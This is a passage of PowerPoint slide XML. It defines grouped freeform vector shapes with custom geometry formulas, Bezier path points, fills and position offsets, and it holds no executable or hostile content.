                      <a:gd name="T0" fmla="*/ 198 w 198"/>
                      <a:gd name="T1" fmla="*/ 7 h 52"/>
                      <a:gd name="T2" fmla="*/ 168 w 198"/>
                      <a:gd name="T3" fmla="*/ 0 h 52"/>
                      <a:gd name="T4" fmla="*/ 0 w 198"/>
                      <a:gd name="T5" fmla="*/ 45 h 52"/>
                      <a:gd name="T6" fmla="*/ 33 w 198"/>
                      <a:gd name="T7" fmla="*/ 52 h 52"/>
                      <a:gd name="T8" fmla="*/ 198 w 198"/>
                      <a:gd name="T9" fmla="*/ 7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8" h="52">
                        <a:moveTo>
                          <a:pt x="198" y="7"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="168" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="45"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="52"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="198" y="7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C0C0C0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6" name="Freeform 640"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="746" y="5013"/>
                    <a:ext cx="26" cy="28"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 9 w 11"/>
                      <a:gd name="T1" fmla="*/ 11 h 12"/>
                      <a:gd name="T2" fmla="*/ 2 w 11"/>
                      <a:gd name="T3" fmla="*/ 8 h 12"/>
                      <a:gd name="T4" fmla="*/ 2 w 11"/>
                      <a:gd name="T5" fmla="*/ 1 h 12"/>
                      <a:gd name="T6" fmla="*/ 9 w 11"/>
                      <a:gd name="T7" fmla="*/ 3 h 12"/>
                      <a:gd name="T8" fmla="*/ 9 w 11"/>
                      <a:gd name="T9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2">
                        <a:moveTo>
                          <a:pt x="9" y="11"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="7" y="12"/>
                          <a:pt x="4" y="11"/>
                          <a:pt x="2" y="8"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="6"/>
                          <a:pt x="0" y="2"/>
                          <a:pt x="2" y="1"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="0"/>
                          <a:pt x="7" y="1"/>
                          <a:pt x="9" y="3"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="11" y="6"/>
                          <a:pt x="11" y="9"/>
                          <a:pt x="9" y="1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7" name="Freeform 641"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="746" y="4332"/>
                    <a:ext cx="26" cy="31"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 9 w 11"/>
                      <a:gd name="T1" fmla="*/ 11 h 13"/>
                      <a:gd name="T2" fmla="*/ 2 w 11"/>
                      <a:gd name="T3" fmla="*/ 9 h 13"/>
                      <a:gd name="T4" fmla="*/ 2 w 11"/>
                      <a:gd name="T5" fmla="*/ 1 h 13"/>
                      <a:gd name="T6" fmla="*/ 9 w 11"/>
                      <a:gd name="T7" fmla="*/ 4 h 13"/>
                      <a:gd name="T8" fmla="*/ 9 w 11"/>
                      <a:gd name="T9" fmla="*/ 1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3">
                        <a:moveTo>
                          <a:pt x="9" y="11"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="7" y="13"/>
                          <a:pt x="4" y="12"/>
                          <a:pt x="2" y="9"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="6"/>
                          <a:pt x="0" y="3"/>
                          <a:pt x="2" y="1"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="0"/>
                          <a:pt x="7" y="1"/>
                          <a:pt x="9" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="11" y="7"/>
                          <a:pt x="11" y="10"/>
                          <a:pt x="9" y="1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8" name="Freeform 642"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="542" y="4339"/>
                    <a:ext cx="218" cy="756"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 92"/>
                      <a:gd name="T1" fmla="*/ 24 h 320"/>
                      <a:gd name="T2" fmla="*/ 0 w 92"/>
                      <a:gd name="T3" fmla="*/ 320 h 320"/>
                      <a:gd name="T4" fmla="*/ 92 w 92"/>
                      <a:gd name="T5" fmla="*/ 295 h 320"/>
                      <a:gd name="T6" fmla="*/ 90 w 92"/>
                      <a:gd name="T7" fmla="*/ 287 h 320"/>
                      <a:gd name="T8" fmla="*/ 8 w 92"/>
                      <a:gd name="T9" fmla="*/ 309 h 320"/>
                      <a:gd name="T10" fmla="*/ 8 w 92"/>
                      <a:gd name="T11" fmla="*/ 30 h 320"/>
                      <a:gd name="T12" fmla="*/ 92 w 92"/>
                      <a:gd name="T13" fmla="*/ 7 h 320"/>
                      <a:gd name="T14" fmla="*/ 90 w 92"/>
                      <a:gd name="T15" fmla="*/ 0 h 320"/>
                      <a:gd name="T16" fmla="*/ 0 w 92"/>
                      <a:gd name="T17" fmla="*/ 24 h 3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2" h="320">
                        <a:moveTo>
                          <a:pt x="0" y="24"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="320"/>
                          <a:pt x="0" y="320"/>
                          <a:pt x="0" y="320"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="92" y="295"/>
                          <a:pt x="92" y="295"/>
                          <a:pt x="92" y="295"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="90" y="287"/>
                          <a:pt x="90" y="287"/>
                          <a:pt x="90" y="287"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="90" y="287"/>
                          <a:pt x="17" y="307"/>
                          <a:pt x="8" y="309"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="8" y="299"/>
                          <a:pt x="8" y="36"/>
                          <a:pt x="8" y="30"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="13" y="29"/>
                          <a:pt x="92" y="7"/>
                          <a:pt x="92" y="7"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="90" y="0"/>
                          <a:pt x="90" y="0"/>
                          <a:pt x="90" y="0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9" name="Freeform 643"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1476" y="4091"/>
                    <a:ext cx="236" cy="787"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 236 w 236"/>
                      <a:gd name="T1" fmla="*/ 787 h 787"/>
                      <a:gd name="T2" fmla="*/ 0 w 236"/>
                      <a:gd name="T3" fmla="*/ 0 h 787"/>
                      <a:gd name="T4" fmla="*/ 236 w 236"/>
                      <a:gd name="T5" fmla="*/ 787 h 7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36" h="787">
                        <a:moveTo>
                          <a:pt x="236" y="787"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="236" y="78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Line 644"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1" flipV="1">
                    <a:off x="1476" y="4091"/>
                    <a:ext cx="236" cy="787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59" name="Freeform 645"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1837" y="3182"/>
                  <a:ext cx="318" cy="306"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 6 w 109"/>
                    <a:gd name="T1" fmla="*/ 19 h 106"/>
                    <a:gd name="T2" fmla="*/ 14 w 109"/>
                    <a:gd name="T3" fmla="*/ 18 h 106"/>
                    <a:gd name="T4" fmla="*/ 13 w 109"/>
                    <a:gd name="T5" fmla="*/ 8 h 106"/>
                    <a:gd name="T6" fmla="*/ 9 w 109"/>
                    <a:gd name="T7" fmla="*/ 1 h 106"/>
                    <a:gd name="T8" fmla="*/ 18 w 109"/>
                    <a:gd name="T9" fmla="*/ 4 h 106"/>
                    <a:gd name="T10" fmla="*/ 24 w 109"/>
                    <a:gd name="T11" fmla="*/ 17 h 106"/>
                    <a:gd name="T12" fmla="*/ 30 w 109"/>
                    <a:gd name="T13" fmla="*/ 26 h 106"/>
                    <a:gd name="T14" fmla="*/ 33 w 109"/>
                    <a:gd name="T15" fmla="*/ 28 h 106"/>
                    <a:gd name="T16" fmla="*/ 85 w 109"/>
                    <a:gd name="T17" fmla="*/ 71 h 106"/>
                    <a:gd name="T18" fmla="*/ 95 w 109"/>
                    <a:gd name="T19" fmla="*/ 72 h 106"/>
                    <a:gd name="T20" fmla="*/ 104 w 109"/>
                    <a:gd name="T21" fmla="*/ 77 h 106"/>
                    <a:gd name="T22" fmla="*/ 109 w 109"/>
                    <a:gd name="T23" fmla="*/ 94 h 106"/>
                    <a:gd name="T24" fmla="*/ 102 w 109"/>
                    <a:gd name="T25" fmla="*/ 85 h 106"/>
                    <a:gd name="T26" fmla="*/ 93 w 109"/>
                    <a:gd name="T27" fmla="*/ 86 h 106"/>
                    <a:gd name="T28" fmla="*/ 94 w 109"/>
                    <a:gd name="T29" fmla="*/ 97 h 106"/>
                    <a:gd name="T30" fmla="*/ 99 w 109"/>
                    <a:gd name="T31" fmla="*/ 105 h 106"/>
                    <a:gd name="T32" fmla="*/ 89 w 109"/>
                    <a:gd name="T33" fmla="*/ 102 h 106"/>
                    <a:gd name="T34" fmla="*/ 82 w 109"/>
                    <a:gd name="T35" fmla="*/ 87 h 106"/>
                    <a:gd name="T36" fmla="*/ 76 w 109"/>
                    <a:gd name="T37" fmla="*/ 77 h 106"/>
                    <a:gd name="T38" fmla="*/ 21 w 109"/>
                    <a:gd name="T39" fmla="*/ 31 h 106"/>
                    <a:gd name="T40" fmla="*/ 13 w 109"/>
                    <a:gd name="T41" fmla="*/ 30 h 106"/>
                    <a:gd name="T42" fmla="*/ 5 w 109"/>
                    <a:gd name="T43" fmla="*/ 26 h 106"/>
                    <a:gd name="T44" fmla="*/ 0 w 109"/>
                    <a:gd name="T45" fmla="*/ 11 h 106"/>
                    <a:gd name="T46" fmla="*/ 6 w 109"/>
                    <a:gd name="T47" fmla="*/ 19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09" h="106">
                      <a:moveTo>
                        <a:pt x="6" y="19"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="20"/>
                        <a:pt x="11" y="23"/>
                        <a:pt x="14" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="12"/>
                        <a:pt x="14" y="9"/>
                        <a:pt x="13" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="7"/>
                        <a:pt x="9" y="2"/>
                        <a:pt x="9" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="1"/>
                        <a:pt x="12" y="0"/>
                        <a:pt x="18" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="8"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="24" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="22"/>
                        <a:pt x="29" y="25"/>
                        <a:pt x="30" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="26"/>
                        <a:pt x="31" y="27"/>
                        <a:pt x="33" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="71"/>
                        <a:pt x="85" y="71"/>
                        <a:pt x="85" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="71"/>
                        <a:pt x="88" y="74"/>
                        <a:pt x="95" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="95" y="72"/>
                        <a:pt x="100" y="71"/>
                        <a:pt x="104" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="83"/>
                        <a:pt x="109" y="91"/>
                        <a:pt x="109" y="94"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="109" y="97"/>
                        <a:pt x="104" y="88"/>
                        <a:pt x="102" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="83"/>
                        <a:pt x="97" y="80"/>
                        <a:pt x="93" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="92"/>
                        <a:pt x="93" y="96"/>
                        <a:pt x="94" y="97"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="95" y="98"/>
                        <a:pt x="99" y="104"/>
                        <a:pt x="99" y="105"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="100" y="105"/>
                        <a:pt x="95" y="106"/>
                        <a:pt x="89" y="102"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="97"/>
                        <a:pt x="83" y="92"/>
                        <a:pt x="82" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="81" y="82"/>
                        <a:pt x="76" y="78"/>
                        <a:pt x="76" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="77"/>
                        <a:pt x="21" y="31"/>
                        <a:pt x="21" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="31"/>
                        <a:pt x="19" y="29"/>
                        <a:pt x="13" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="30"/>
                        <a:pt x="8" y="32"/>
                        <a:pt x="5" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="21"/>
                        <a:pt x="0" y="13"/>
                        <a:pt x="0" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="8"/>
                        <a:pt x="5" y="17"/>
                        <a:pt x="6" y="1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350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="1B161B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21" name="Group 646"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4551204" y="2315456"/>
              <a:ext cx="2947442" cy="564457"/>
              <a:chOff x="1137" y="2444"/>
              <a:chExt cx="2505" cy="480"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="422" name="Group 647"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2632" y="2851"/>
                <a:ext cx="428" cy="73"/>
                <a:chOff x="1343" y="3096"/>
                <a:chExt cx="428" cy="73"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="484" name="Freeform 648"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1" flipV="1">
                  <a:off x="1343" y="3096"/>
                  <a:ext cx="428" cy="57"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 2688"/>
                    <a:gd name="T1" fmla="*/ 0 h 361"/>
                    <a:gd name="T2" fmla="*/ 1344 w 2688"/>
                    <a:gd name="T3" fmla="*/ 361 h 361"/>
                    <a:gd name="T4" fmla="*/ 2688 w 2688"/>
                    <a:gd name="T5" fmla="*/ 0 h 361"/>
                    <a:gd name="T6" fmla="*/ 0 w 2688"/>
                    <a:gd name="T7" fmla="*/ 0 h 3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688" h="361">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1344" y="361"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268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9900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Rectangle 649"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1343" y="3153"/>
                  <a:ext cx="428" cy="16"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
                <a:ln w="6350" algn="ctr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23" name="Group 650"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2928" y="2697"/>
                <a:ext cx="714" cy="207"/>
                <a:chOff x="3577" y="3770"/>
                <a:chExt cx="714" cy="207"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="468" name="Group 651"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3720" y="3808"/>
                  <a:ext cx="286" cy="92"/>
                  <a:chOff x="3720" y="3808"/>
                  <a:chExt cx="286" cy="92"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="481" name="Freeform 652"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3792" y="3828"/>
                    <a:ext cx="214" cy="72"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1344"/>
                      <a:gd name="T1" fmla="*/ 0 h 456"/>
                      <a:gd name="T2" fmla="*/ 0 w 1344"/>
                      <a:gd name="T3" fmla="*/ 96 h 456"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T5" fmla="*/ 456 h 456"/>
                      <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T7" fmla="*/ 359 h 456"/>
                      <a:gd name="T8" fmla="*/ 0 w 1344"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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44" h="456">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="96"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="456"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="35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2" name="Freeform 653"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3720" y="3866"/>
                    <a:ext cx="72" cy="34"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 447"/>
                      <a:gd name="T1" fmla="*/ 218 h 218"/>
                      <a:gd name="T2" fmla="*/ 0 w 447"/>
                      <a:gd name="T3" fmla="*/ 121 h 218"/>
                      <a:gd name="T4" fmla="*/ 447 w 447"/>
                      <a:gd name="T5" fmla="*/ 0 h 218"/>
                      <a:gd name="T6" fmla="*/ 447 w 447"/>
                      <a:gd name="T7" fmla="*/ 97 h 218"/>
                      <a:gd name="T8" fmla="*/ 0 w 447"/>
                      <a:gd name="T9" fmla="*/ 218 h 2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47" h="218">
                        <a:moveTo>
                          <a:pt x="0" y="218"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="447" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="447" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="218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3" name="Freeform 654"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3720" y="3808"/>
                    <a:ext cx="286" cy="77"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 449 w 1791"/>
                      <a:gd name="T1" fmla="*/ 0 h 480"/>
                      <a:gd name="T2" fmla="*/ 1791 w 1791"/>
                      <a:gd name="T3" fmla="*/ 359 h 480"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1791"/>
                      <a:gd name="T5" fmla="*/ 480 h 480"/>
                      <a:gd name="T6" fmla="*/ 0 w 1791"/>
                      <a:gd name="T7" fmla="*/ 121 h 480"/>
                      <a:gd name="T8" fmla="*/ 449 w 1791"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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791" h="480">
                        <a:moveTo>
                          <a:pt x="449" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1791" y="359"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="480"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="449" y="0"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="009900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9" name="Group 655"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3577" y="3770"/>
                  <a:ext cx="286" cy="92"/>
                  <a:chOff x="3577" y="3770"/>
                  <a:chExt cx="286" cy="92"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="478" name="Freeform 656"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3649" y="3789"/>
                    <a:ext cx="214" cy="73"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1344"/>
                      <a:gd name="T1" fmla="*/ 0 h 458"/>
                      <a:gd name="T2" fmla="*/ 0 w 1344"/>
                      <a:gd name="T3" fmla="*/ 97 h 458"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T5" fmla="*/ 458 h 458"/>
                      <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T7" fmla="*/ 359 h 458"/>
                      <a:gd name="T8" fmla="*/ 0 w 1344"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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44" h="458">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="458"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="35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9" name="Freeform 657"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3577" y="3828"/>
                    <a:ext cx="72" cy="34"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 448"/>
                      <a:gd name="T1" fmla="*/ 217 h 217"/>
                      <a:gd name="T2" fmla="*/ 0 w 448"/>
                      <a:gd name="T3" fmla="*/ 118 h 217"/>
                      <a:gd name="T4" fmla="*/ 448 w 448"/>
                      <a:gd name="T5" fmla="*/ 0 h 217"/>
                      <a:gd name="T6" fmla="*/ 448 w 448"/>
                      <a:gd name="T7" fmla="*/ 96 h 217"/>
                      <a:gd name="T8" fmla="*/ 0 w 448"/>
                      <a:gd name="T9" fmla="*/ 217 h 2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48" h="217">
                        <a:moveTo>
                          <a:pt x="0" y="217"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="118"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="96"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="217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0" name="Freeform 658"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3577" y="3770"/>
                    <a:ext cx="286" cy="76"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 448 w 1792"/>
                      <a:gd name="T1" fmla="*/ 0 h 480"/>
                      <a:gd name="T2" fmla="*/ 1792 w 1792"/>
                      <a:gd name="T3" fmla="*/ 362 h 480"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1792"/>
                      <a:gd name="T5" fmla="*/ 480 h 480"/>
                      <a:gd name="T6" fmla="*/ 0 w 1792"/>
                      <a:gd name="T7" fmla="*/ 121 h 480"/>
                      <a:gd name="T8" fmla="*/ 448 w 1792"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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792" h="480">
                        <a:moveTo>
                          <a:pt x="448" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1792" y="362"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="480"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="0"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="009900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70" name="Group 659"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3863" y="3846"/>
                  <a:ext cx="285" cy="93"/>
                  <a:chOff x="3863" y="3846"/>
                  <a:chExt cx="285" cy="93"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="475" name="Freeform 660"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3934" y="3866"/>
                    <a:ext cx="214" cy="73"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1344"/>
                      <a:gd name="T1" fmla="*/ 0 h 459"/>
                      <a:gd name="T2" fmla="*/ 0 w 1344"/>
                      <a:gd name="T3" fmla="*/ 97 h 459"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T5" fmla="*/ 459 h 459"/>
                      <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T7" fmla="*/ 362 h 459"/>
                      <a:gd name="T8" fmla="*/ 0 w 1344"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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44" h="459">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="459"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="36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6" name="Freeform 661"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3863" y="3904"/>
                    <a:ext cx="71" cy="35"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 447"/>
                      <a:gd name="T1" fmla="*/ 218 h 218"/>
